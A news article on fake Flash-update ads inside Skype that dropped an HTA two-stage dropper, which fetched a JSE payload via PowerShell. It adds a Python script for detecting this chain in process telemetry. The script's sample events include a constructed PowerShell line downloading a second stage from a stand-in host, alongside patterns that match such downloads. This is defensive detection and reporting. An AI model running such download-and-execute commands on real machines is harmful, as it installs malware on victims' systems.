Skype Malware Ads
The ad pretended to be a Flash update for the computer’s browser and would prompt the user to download an HTML application named “FlashPlayer.hta.” - Image: Reddit

The Internet is a place where you can find pretty much anything. Along with the good content, however, comes a huge variety of things designed to exploit security vulnerabilities and the trust of users.

A Reddit user has now revealed in a thread that a malicious ad appeared while he was on Skype’s home screen. The ad pretended to be a Flash update for the computer’s browser and would prompt the user to download an HTML application named “FlashPlayer.hta.”

It appears that, once opened, the HTML application would download a malicious payload that could harm the computer in the long run. The Redditor did not run the application; instead, he deconstructed the code and posted it publicly on Reddit.

Other users have complained about malicious ads inside Skype, with the “fake Flash update” as a common denominator.

//twitter.com/ElectriicDev/status/847474592109125632

How the malicious code works

In response to the Reddit thread, ZDNet has contacted several experts to deconstruct the code and explain how it works. According to malware experts, the malicious ads have the following characteristics:

  • They target Windows machines by pushing a file download
  • When users open the file, they trigger obfuscated JavaScript
  • The code starts a new command line, then deletes the app the user just opened
  • It then runs a PowerShell command, which downloads JavaScript Encoded Script (JSE) from a domain that no longer exists
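As an added illustration (not code from the original article or from any of the experts it quotes), the Python sketch below shows how a defender might spot that execution chain in process-creation telemetry: it walks parent/child relationships and flags a PowerShell download whose ancestry includes mshta.exe, noting whether a cmd.exe in the chain deleted the .hta. The event records, paths and the example.invalid URL are constructed for the example.

```python
"""Detection sketch for the chain described above: mshta.exe opens the .hta,
cmd.exe deletes it, powershell.exe fetches a .jse second stage."""
import re

# Constructed process-creation events in the shape of Sysmon Event ID 1
# (pid, ppid, image, command line). All values are illustrative, not real.
SAMPLE_EVENTS = [
    {"pid": 400, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 1201, "ppid": 400, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Users\u\Downloads\FlashPlayer.hta"'},
    {"pid": 1305, "ppid": 1201, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd.exe /c del "C:\Users\u\Downloads\FlashPlayer.hta"'},
    {"pid": 1310, "ppid": 1305, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -c (New-Object Net.WebClient).DownloadFile("
            "'http://example.invalid/stage2.jse','%TEMP%\\stage2.jse')"},
    {"pid": 2000, "ppid": 400, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Process"},  # benign, must not be flagged
]

# Command-line markers of a download stage / JSE fetch and of the self-delete step.
DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\.jse\b", re.I)
HTA_DELETE_RE = re.compile(r"\bdel\b.*\.hta", re.I)

def image_name(event):
    """Base name of the executable, lower-cased (e.g. 'mshta.exe')."""
    return event["image"].rsplit("\\", 1)[-1].lower()

def ancestors(event, by_pid):
    """Yield parent, grandparent, ... until the chain leaves the event set."""
    cur = by_pid.get(event["ppid"])
    while cur is not None:
        yield cur
        cur = by_pid.get(cur["ppid"])

def find_hta_dropper_chains(events):
    """Return (powershell pid, mshta pid, hta_deleted) for every PowerShell
    download whose process ancestry contains mshta.exe."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if image_name(e) != "powershell.exe" or not DOWNLOAD_RE.search(e["cmd"]):
            continue
        chain = list(ancestors(e, by_pid))
        hta = next((a for a in chain if image_name(a) == "mshta.exe"), None)
        if hta is None:
            continue
        deleted = any(image_name(a) == "cmd.exe" and HTA_DELETE_RE.search(a["cmd"]) for a in chain)
        findings.append((e["pid"], hta["pid"], deleted))
    return findings

if __name__ == "__main__":
    for ps_pid, hta_pid, deleted in find_hta_dropper_chains(SAMPLE_EVENTS):
        print(f"HTA dropper chain: mshta pid {hta_pid} -> powershell pid {ps_pid}; .hta deleted: {deleted}")
```

On real telemetry the same walk runs over Sysmon or EDR process events keyed by ProcessId/ParentProcessId; the benign Get-Process entry shows why ancestry, not the PowerShell image alone, is the signal.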

In addition, ZDNet has contacted Ali-Reza Anghaie, co-founder of cybersecurity firm Phobos Group, to comment on the matter. Anghaie has said that “This is what’s generally called a ‘two stage dropper’. It’s effectively the utility component of the malware that then decides what else to do based on the command and control it connects to.”

Microsoft: Customers should be cautious

Responding to the issue, a Microsoft spokesperson has said that the Redmond giant should not be held responsible.

The company’s spokesperson has explained that “[Microsoft is] aware of a social engineering technique that could be used to direct some customers to a malicious website. [Microsoft continues] to encourage customers to exercise caution when opening unsolicited attachments and links from both known and unknown sources and install and regularly update antivirus software.”

A spin-off of Locky ransomware?

According to the Reddit thread and to the several experts that ZDNet has contacted, this “fake Flash update” could be a spin-off of a recent Locky ransomware campaign. Locky uses a JavaScript file to download the ransomware onto victims’ computers.

In November 2016, Microsoft warned against Black Friday-themed malware: taking advantage of the large volume of Black Friday purchases, the Locky campaign successfully spoofed Amazon emails.

Locky also hit Facebook and other social media in November 2016; the security firm Check Point uncovered this new method of distributing malware code through image files.